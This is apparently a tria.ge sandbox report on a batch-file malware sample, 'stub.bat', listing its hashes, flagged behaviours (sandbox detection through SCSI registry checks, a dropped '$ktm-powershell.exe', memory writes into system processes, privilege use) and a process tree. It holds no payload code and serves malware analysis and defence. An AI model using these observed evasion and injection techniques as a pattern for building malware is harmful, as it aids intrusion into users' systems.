Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
600s -
max time network
440s -
platform
windows11-21h2_x64 -
resource
win11-20240704-en -
resource tags
arch:x64arch:x86image:win11-20240704-enlocale:en-usos:windows11-21h2-x64system -
submitted
08/07/2024, 15:19
Static task
static1
Behavioral task
behavioral1
Sample
stub.bat
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
stub.bat
Resource
win10v2004-20240708-en
Behavioral task
behavioral3
Sample
stub.bat
Resource
win11-20240704-en
General
-
Target
stub.bat
-
Size
3.4MB
-
MD5
c27b8c9f05c86817d8d287f0d0bd8698
-
SHA1
239748a1871a85c7df6733bc24d9497a331aca87
-
SHA256
cd6c05138680001d640a47ed988487797a4b77e95bff6c4f57ae57d294aa53e1
-
SHA512
fbd18278c1d8c18360f16cf11db634162cb7e14484853496670ca074e06cbd26f5933b9cd22046063da3f86c294c786c20a00545baa8cbdc76a6af61c55c7bca
-
SSDEEP
49152:/mThC67EFbMUKiKknefnfIlTYhjwHs0j+VqdyvZWs6sT/Pj5wSe/XDX/DlbfZ5+m:n
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 1 2296 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 5052 $ktm-powershell.exe -
Drops file in System32 directory 14 IoCs
description ioc Process File created C:\Windows\system32\PerfStringBackup.TMP WMIADAP.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-DxgKrnl-Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-AppxPackaging%4Operational.evtx svchost.exe File created C:\Windows\system32\perfh009.dat WMIADAP.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-DxgKrnl-Admin.evtx svchost.exe File created C:\Windows\system32\perfc009.dat WMIADAP.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Kernel-EventTracing%4Admin.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-TWinUI%4Operational.evtx svchost.exe File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini WMIADAP.EXE File created C:\Windows\system32\wbem\Performance\WmiApRpl_new.h WMIADAP.EXE File opened for modification C:\Windows\system32\PerfStringBackup.INI WMIADAP.EXE -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\inf\WmiApRpl\WmiApRpl.h WMIADAP.EXE File opened for modification C:\Windows\inf\WmiApRpl\WmiApRpl.h WMIADAP.EXE File created C:\Windows\inf\WmiApRpl\WmiApRpl.ini WMIADAP.EXE File opened for modification C:\Windows\inf\WmiApRpl\WmiApRpl.ini WMIADAP.EXE -
pid Process 2296 powershell.exe -
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 svchost.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dwm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession\CLSID winlogon.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession\KeyboardLayout = "0" winlogon.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "172" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\MachinePreferredUILanguages = 65006e002d005500530000000000 winlogon.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession\Profile winlogon.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\CTF\RemoteSession winlogon.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1136334635-2482839916-910800802-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Explorer.EXE -
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 2296 powershell.exe 2296 powershell.exe 2296 powershell.exe 2296 powershell.exe 2296 powershell.exe 2296 powershell.exe 2296 powershell.exe 2296 powershell.exe 5052 $ktm-powershell.exe 5052 $ktm-powershell.exe 2296 powershell.exe 2296 powershell.exe 2296 powershell.exe 2296 powershell.exe 2296 powershell.exe 2296 powershell.exe 2296 powershell.exe 2296 powershell.exe 2296 powershell.exe 2296 powershell.exe 2296 powershell.exe 2296 powershell.exe -
Suspicious behavior: LoadsDriver 64 IoCs
pid Process 2088 Process not Found 2608 Process not Found 1708 Process not Found 3148 Process not Found 1832 Process not Found 5088 Process not Found 652 Process not Found 3080 Process not Found 4580 Process not Found 3228 Process not Found 1360 Process not Found 1276 Process not Found 1336 Process not Found 2508 Process not Found 4752 Process not Found 3860 Process not Found 5108 Process not Found 2208 Process not Found 1304 Process not Found 2908 Process not Found 2924 Process not Found 3056 Process not Found 1628 Process not Found 4740 Process not Found 4312 Process not Found 3476 Process not Found 2076 Process not Found 1484 Process not Found 1076 Process not Found 4760 Process not Found 4408 Process not Found 4736 Process not Found 2784 Process not Found 772 Process not Found 2860 Process not Found 388 Process not Found 3280 Process not Found 3764 Process not Found 964 Process not Found 2920 Process not Found 4940 Process not Found 3684 Process not Found 952 Process not Found 728 Process not Found 1188 Process not Found 2704 Process not Found 1436 Process not Found 3272 Process not Found 1204 Process not Found 2256 Process not Found 392 Process not Found 4448 Process not Found 352 Process not Found 2368 Process not Found 1808 Process not Found 3824 Process not Found 968 Process not Found 720 Process not Found 4496 Process not Found 1856 Process not Found 3452 Process not Found 5076 Process not Found 2200 Process not Found 1724 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2296 powershell.exe Token: SeDebugPrivilege 2296 powershell.exe Token: SeDebugPrivilege 2296 powershell.exe Token: SeDebugPrivilege 5052 $ktm-powershell.exe Token: SeCreateGlobalPrivilege 4168 dwm.exe Token: SeChangeNotifyPrivilege 4168 dwm.exe Token: 33 4168 dwm.exe Token: SeIncBasePriorityPrivilege 4168 dwm.exe Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeCreateGlobalPrivilege 2440 dwm.exe Token: SeChangeNotifyPrivilege 2440 dwm.exe Token: 33 2440 dwm.exe Token: SeIncBasePriorityPrivilege 2440 dwm.exe Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeCreateGlobalPrivilege 4804 dwm.exe Token: SeChangeNotifyPrivilege 4804 dwm.exe Token: 33 4804 dwm.exe Token: SeIncBasePriorityPrivilege 4804 dwm.exe Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeCreateGlobalPrivilege 1820 dwm.exe Token: SeChangeNotifyPrivilege 1820 dwm.exe Token: 33 1820 dwm.exe Token: SeIncBasePriorityPrivilege 1820 dwm.exe Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeCreateGlobalPrivilege 2412 dwm.exe Token: SeChangeNotifyPrivilege 2412 dwm.exe Token: 33 2412 dwm.exe Token: SeIncBasePriorityPrivilege 2412 dwm.exe Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeCreateGlobalPrivilege 3688 dwm.exe Token: SeChangeNotifyPrivilege 3688 dwm.exe Token: 33 3688 dwm.exe Token: SeIncBasePriorityPrivilege 3688 dwm.exe Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeCreateGlobalPrivilege 2784 dwm.exe Token: SeChangeNotifyPrivilege 2784 dwm.exe Token: 33 2784 dwm.exe Token: SeIncBasePriorityPrivilege 2784 dwm.exe Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeShutdownPrivilege 3396 Explorer.EXE Token: SeCreatePagefilePrivilege 3396 Explorer.EXE Token: SeCreateGlobalPrivilege 1468 dwm.exe Token: SeChangeNotifyPrivilege 1468 dwm.exe Token: 33 1468 dwm.exe Token: SeIncBasePriorityPrivilege 1468 dwm.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 3396 Explorer.EXE 3396 Explorer.EXE -
Suspicious use of SendNotifyMessage 28 IoCs
pid Process 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE 3396 Explorer.EXE -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1432 LogonUI.exe 3396 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3676 wrote to memory of 2296 3676 cmd.exe 81 PID 3676 wrote to memory of 2296 3676 cmd.exe 81 PID 2296 wrote to memory of 644 2296 powershell.exe 5 PID 2296 wrote to memory of 700 2296 powershell.exe 7 PID 2296 wrote to memory of 1004 2296 powershell.exe 12 PID 2296 wrote to memory of 548 2296 powershell.exe 13 PID 700 wrote to memory of 2628 700 lsass.exe 44 PID 700 wrote to memory of 2628 700 lsass.exe 44 PID 2296 wrote to memory of 780 2296 powershell.exe 14 PID 700 wrote to memory of 2628 700 lsass.exe 44 PID 2296 wrote to memory of 684 2296 powershell.exe 15 PID 2296 wrote to memory of 1044 2296 powershell.exe 16 PID 2296 wrote to memory of 1064 2296 powershell.exe 17 PID 2296 wrote to memory of 1196 2296 powershell.exe 19 PID 2296 wrote to memory of 1244 2296 powershell.exe 20 PID 2296 wrote to memory of 1284 2296 powershell.exe 21 PID 2296 wrote to memory of 1340 2296 powershell.exe 22 PID 2296 wrote to memory of 1420 2296 powershell.exe 23 PID 2296 wrote to memory of 1472 2296 powershell.exe 24 PID 2296 wrote to memory of 1524 2296 powershell.exe 25 PID 2296 wrote to memory of 1580 2296 powershell.exe 26 PID 2296 wrote to memory of 1600 2296 powershell.exe 27 PID 2296 wrote to memory of 1684 2296 powershell.exe 28 PID 2296 wrote to memory of 1748 2296 powershell.exe 29 PID 2296 wrote to memory of 1796 2296 powershell.exe 30 PID 2296 wrote to memory of 1868 2296 powershell.exe 31 PID 2296 wrote to memory of 1900 2296 powershell.exe 32 PID 2296 wrote to memory of 5052 2296 powershell.exe 86 PID 2296 wrote to memory of 5052 2296 powershell.exe 86 PID 700 wrote to memory of 2628 700 lsass.exe 44 PID 700 wrote to memory of 2628 700 lsass.exe 44 PID 2296 wrote to memory of 1960 2296 powershell.exe 33 PID 2296 wrote to memory of 1968 2296 powershell.exe 34 PID 2296 wrote to memory of 1652 2296 powershell.exe 35 PID 2296 wrote to memory of 1944 2296 powershell.exe 36 PID 2296 wrote to memory of 2164 2296 powershell.exe 37 PID 2296 wrote to memory of 2312 2296 powershell.exe 39 PID 2296 wrote to memory of 2400 2296 powershell.exe 40 PID 2296 wrote to memory of 2564 2296 powershell.exe 41 PID 2296 wrote to memory of 2572 2296 powershell.exe 42 PID 2296 wrote to memory of 2600 2296 powershell.exe 43 PID 2296 wrote to memory of 2628 2296 powershell.exe 44 PID 2296 wrote to memory of 2728 2296 powershell.exe 45 PID 2296 wrote to memory of 2736 2296 powershell.exe 46 PID 2296 wrote to memory of 2748 2296 powershell.exe 47 PID 644 wrote to memory of 4168 644 winlogon.exe 88 PID 644 wrote to memory of 4168 644 winlogon.exe 88 PID 2296 wrote to memory of 4168 2296 powershell.exe 88 PID 700 wrote to memory of 2628 700 lsass.exe 44 PID 2296 wrote to memory of 2756 2296 powershell.exe 48 PID 2296 wrote to memory of 2896 2296 powershell.exe 49 PID 2296 wrote to memory of 2992 2296 powershell.exe 50 PID 2296 wrote to memory of 3160 2296 powershell.exe 51 PID 2296 wrote to memory of 3396 2296 powershell.exe 52 PID 644 wrote to memory of 2440 644 winlogon.exe 553 PID 644 wrote to memory of 2440 644 winlogon.exe 553 PID 2296 wrote to memory of 2440 2296 powershell.exe 553 PID 2296 wrote to memory of 3556 2296 powershell.exe 53 PID 700 wrote to memory of 2628 700 lsass.exe 44 PID 2296 wrote to memory of 3572 2296 powershell.exe 54 PID 2296 wrote to memory of 3984 2296 powershell.exe 57 PID 644 wrote to memory of 4804 644 winlogon.exe 495 PID 644 wrote to memory of 4804 644 winlogon.exe 495 PID 2296 wrote to memory of 4804 2296 powershell.exe 495 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:644 -
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:548
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4168
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2440
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4804
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1820
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2412
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3688
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2784
-
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x0 /state0:0xa3a15855 /state1:0x41c64e6d2⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1432
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious use of WriteProcessMemory
PID:700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:1004
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:780
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:684
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1044
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1064
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1196
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵PID:1244
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1284
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1340
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1420
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1472
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1524
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2896
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1580
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1600
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1748
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1796
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1868
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1900
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004C0 0x00000000000004E02⤵PID:928
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1960
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1968
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:1652
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1944
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2164
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2312
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2400
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2564
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2572
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:2600
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2628
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2728
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2736
-
C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /R /T2⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:4832
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2748
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2756
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2992
-
